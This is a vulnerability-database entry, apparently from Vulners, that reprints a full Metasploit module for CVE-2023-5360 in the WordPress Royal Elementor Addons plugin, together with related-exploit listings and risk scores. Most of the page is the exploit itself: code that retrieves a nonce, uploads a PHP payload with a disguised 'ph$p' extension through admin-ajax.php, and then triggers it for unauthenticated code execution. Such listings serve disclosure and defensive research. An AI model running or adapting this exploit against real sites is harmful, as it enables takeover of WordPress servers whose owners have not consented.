Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

WordPress Royal Elementor Addons Remote Code Execution Exploit

🗓️ 28 Nov 2023 00:00:00Reported by metasploitType 
zdt
 zdt🔗 0day.today👁 410 Views

WordPress Royal Elementor Addons unauthenticated file upload vulnerability exploit for RCE

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit		Exploit for Unrestricted Upload of File with Dangerous Type in Royal-Elementor-Addons Royal_Elementor_Addons
14 Jul 202518:09
githubexploit
GithubExploit		Exploit for Unrestricted Upload of File with Dangerous Type in Royal-Elementor-Addons Royal_Elementor_Addons
27 Dec 202513:27
githubexploit
GithubExploit		Mephisto
21 May 202605:06
githubexploit
GithubExploit		Exploit for Unrestricted Upload of File with Dangerous Type in Royal-Elementor-Addons Royal_Elementor_Addons
5 Nov 202318:02
githubexploit
GithubExploit		Exploit for Unrestricted Upload of File with Dangerous Type in Royal-Elementor-Addons Royal_Elementor_Addons
2 Nov 202303:15
githubexploit
GithubExploit		Exploit for Unrestricted Upload of File with Dangerous Type in Royal-Elementor-Addons Royal_Elementor_Addons
3 Nov 202300:58
githubexploit
GithubExploit		Exploit for CVE-2023-4666
14 Oct 202314:04
githubexploit
0day.today		WordPress Royal Elementor 1.3.78 Shell Upload Vulnerability
16 Oct 202300:00
zdt
ATTACKERKB		CVE-2023-5360
31 Oct 202300:00
attackerkb
BDU FSTEC		The vulnerability of the Royal Elementor Addons and Templates plugin of the WordPress content management system allows a hacker to execute arbitrary code by loading a specially created file.
21 Oct 202300:00
bdu_fstec
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HTTP::Wordpress
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'WordPress Royal Elementor Addons RCE',
        'Description' => %q{
          Exploit for the unauthenticated file upload vulnerability in WordPress Royal Elementor Addons and Templates plugin (< 1.3.79).
        },
        'Author' => [
          'Fioravante Souza', # Vulnerability discovery
          'Valentin Lobstein' # Metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2023-5360'],
          ['URL', 'https://vulners.com/nuclei/NUCLEI:CVE-2023-5360'],
          ['WPVDB', '281518ff-7816-4007-b712-63aed7828b34']
        ],
        'Platform' => ['unix', 'linux', 'win', 'php'],
        'Arch' => [ARCH_PHP, ARCH_CMD],
        'Targets' => [['Automatic', {}]],
        'DisclosureDate' => '2023-11-23',
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'SSL' => true,
          'RPORT' => 443
        },
        'Privileged' => false,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
  )
  end

  def check
    return CheckCode::Unknown unless wordpress_and_online?

    wp_version = wordpress_version
    print_status("WordPress Version: #{wp_version}") if wp_version

    check_code = check_plugin_version_from_readme('royal-elementor-addons', '1.3.79')

    if check_code.code != 'appears'
      return CheckCode::Safe
    end

    plugin_version = check_code.details[:version]
    print_good("Detected Royal Elementor Addons version: #{plugin_version}")
    return CheckCode::Appears
  end

  def exploit
    print_status('Attempting to retrieve nonce...')
    nonce = retrieve_nonce

    print_status('Sending payload')
    uri = normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php')

    data = {
      'action' => 'wpr_addons_upload_file',
      'max_file_size' => rand(10001),
      'allowed_file_types' => 'ph$p',
      'triggering_event' => 'click',
      'wpr_addons_nonce' => nonce
    }

    file_content = '<?php '
    file_content << (payload_instance.arch.include?(ARCH_PHP) ? payload.encoded : "system(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));")
    file_content << '?>'

    file_name = "#{Rex::Text.rand_text_alphanumeric(8)}.ph$p"

    post_data = Rex::MIME::Message.new
    post_data.add_part(file_content, 'application/octet-stream', nil, "form-data; name=\"uploaded_file\"; filename=\"#{file_name}\"")
    data.each_pair do |key, value|
      post_data.add_part(value.to_s, nil, nil, "form-data; name=\"#{key}\"")
    end

    res = send_request_cgi({
      'uri' => uri,
      'method' => 'POST',
      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
      'data' => post_data.to_s
    })

    unless res
      fail_with(Failure::Unreachable, 'No response received from the target')
    end

    if res.code == 200 && res.body.include?('success')
      print_good('Payload uploaded successfully')
      response_data = JSON.parse(res.body)
      if response_data.key?('data') && response_data['data'].key?('url')
        file_url = response_data['data']['url']
        print_status('Triggering the payload')
        send_request_cgi({
          'uri' => file_url,
          'method' => 'GET'
        })

      else
        fail_with(Failure::UnexpectedReply, 'Payload uploaded but no URL returned in the response')
      end
    else
      fail_with(Failure::UnexpectedReply, 'Failed to upload the payload')
    end
  end

  def retrieve_nonce
    res = send_request_cgi('uri' => normalize_uri(target_uri.path), 'method' => 'GET')

    fail_with(Failure::Unreachable, 'No response received from the target') if res.nil?
    fail_with(Failure::UnexpectedReply, "Unexpected HTTP response code from the target: #{res.code}") if res.code != 200

    match = res.body.match(/var\s+WprConfig\s*=\s*({.+?});/)
    fail_with(Failure::NoTarget, 'Nonce not found in the response. Is Royal Elementor Addons activated AND being used by the WordPress site being targeted?') if match.nil? || match[1].nil?

    nonce = JSON.parse(match[1])['nonce']
    fail_with(Failure::NoTarget, 'Parsed a response, but the nonce value is missing') if nonce.nil?

    print_good("Nonce found in response: #{nonce.inspect}")
    nonce
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
28 Nov 2023 00:00Current
9.6High risk
Vulners AI Score9.6
CVSS 3.19.8
EPSS0.93478
wordpressroyal elementor addonsunauthenticated file uploadvulnerabilityrcemetasploitexploitfioravante souzavalentin lobsteincve-2023-5360file uploadunixlinuxwinphpstabilityreliabilityside effectswordpress versionmetasploit moduleremote code execution
410